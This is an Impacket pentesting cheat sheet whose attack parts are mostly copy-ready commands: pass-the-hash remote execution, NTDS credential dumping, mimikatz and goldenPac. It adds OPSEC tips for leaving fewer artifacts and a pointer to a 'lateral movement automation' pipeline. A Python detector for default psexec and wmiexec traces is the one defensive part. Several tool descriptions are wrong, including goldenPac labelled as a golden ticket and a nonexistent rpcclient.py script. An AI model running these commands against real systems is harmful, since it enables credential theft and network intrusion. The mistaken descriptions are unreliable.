# Impacket Usage Reference

## Overview

Impacket is a collection of Python classes for working with network protocols (SMB, MSRPC, Kerberos, LDAP and others), shipped with example scripts that make it a core tool for Windows and Active Directory pentesting.

## Installation

```bash
pip install impacket

# Or from source:
git clone https://github.com/fortra/impacket
cd impacket && pip install .
```
## Key Scripts

### Remote Execution

```bash
# psexec.py - Pass-the-Hash
python3 psexec.py DOMAIN/user@target.lan -hashes lm:ntlm

# wmiexec.py - Stealth WMI exec
python3 wmiexec.py DOMAIN/user@target.lan -hashes lm:ntlm

# atexec.py - Scheduled task exec
python3 atexec.py DOMAIN/user@target.lan -hashes lm:ntlm
```

### Credential Extraction

```bash
# secretsdump.py - NTDS.dit extraction
python3 secretsdump.py DOMAIN/user@target.lan -hashes lm:ntlm

# mimikatz.py - Remote mimikatz
python3 mimikatz.py DOMAIN/user@target.lan -hashes lm:ntlm
```
### Kerberos Attacks

```bash
# getTGT.py - Request a TGT (saved as a .ccache file)
python3 getTGT.py DOMAIN/user:password

# goldenPac.py - Golden ticket + auto-exec
python3 goldenPac.py DOMAIN/user@target.lan
```
### Network Discovery

```bash
# smbclient.py - Anonymous SMB share browsing
python3 smbclient.py DOMAIN/user@target.lan

# rpcclient.py - RPC bind
python3 rpcclient.py target.lan -N
```
## OPSEC Notes

- wmiexec.py leaves fewer artifacts than psexec.py
- Use -dc-ip for Kerberoasting
- secretsdump.py requires domain admin or NTDS.dit access
- Always check firewall rules before port scanning
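The artifact difference in the first note above is what a blue team keys on. The following is an added example, not part of this reference or of Impacket itself: it runs simple matchers for the default psexec.py service-install footprint and the default wmiexec.py command pattern over constructed Sysmon-style process-creation and System-log 7045 records. The field names, and the 4-letter service name and 8-letter binary name for psexec.py, are assumptions about the tools' defaults.

```python
import re

# Constructed sample telemetry (not real logs); field names are assumed to
# mirror Sysmon Event 1 (process creation) and System log Event 7045 (service
# installed). Adapt the keys to whatever your SIEM actually emits.
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1700000000.12 2>&1"},
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c dir"},
    {"id": 7045, "service": "XmQa", "image": r"C:\Windows\XtEgPqLz.exe"},
    {"id": 7045, "service": "Sysmon64", "image": r"C:\Windows\Sysmon64.exe"},
]

# wmiexec.py default: a cmd.exe spawned by WmiPrvSE.exe whose output is
# redirected to a timestamp-named file on the ADMIN$ share via 127.0.0.1.
WMIEXEC_OUTPUT = re.compile(r"\\\\127\.0\.0\.1\\ADMIN\$\\__\d+", re.IGNORECASE)
# psexec.py default (assumed from the tool's usual behaviour): a new service
# with a random 4-letter name whose binary is a random 8-letter .exe dropped
# into the ADMIN$ share root.
RANDOM_SERVICE = re.compile(r"^[A-Za-z]{4}$")
RANDOM_BINARY = re.compile(r"\\[A-Za-z]{8}\.exe$")


def classify(event):
    """Return the Impacket script an event resembles, or None."""
    if event["id"] == 1:
        wmi_parent = event["parent"].lower().endswith("wmiprvse.exe")
        if wmi_parent and WMIEXEC_OUTPUT.search(event["cmdline"]):
            return "wmiexec.py"
    elif event["id"] == 7045:
        if RANDOM_SERVICE.match(event["service"]) and RANDOM_BINARY.search(event["image"]):
            return "psexec.py"
    return None


def scan(events):
    """Return (event id, script) pairs for every event that matches."""
    return [(e["id"], tool) for e in events if (tool := classify(e))]


if __name__ == "__main__":
    for event_id, tool in scan(SAMPLE_EVENTS):
        print(f"event {event_id}: looks like {tool}")
```

Both matchers are on default behaviour only; an operator who renames the service or changes the output path will not trip them, so treat them as a starting point rather than a complete rule set.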
## GreySec Engagement Notes

Used in: `exploit-pipeline` for lateral movement automation.

See: https://gsfiles.tail57cd.ts.net/greysec/exploit-pipeline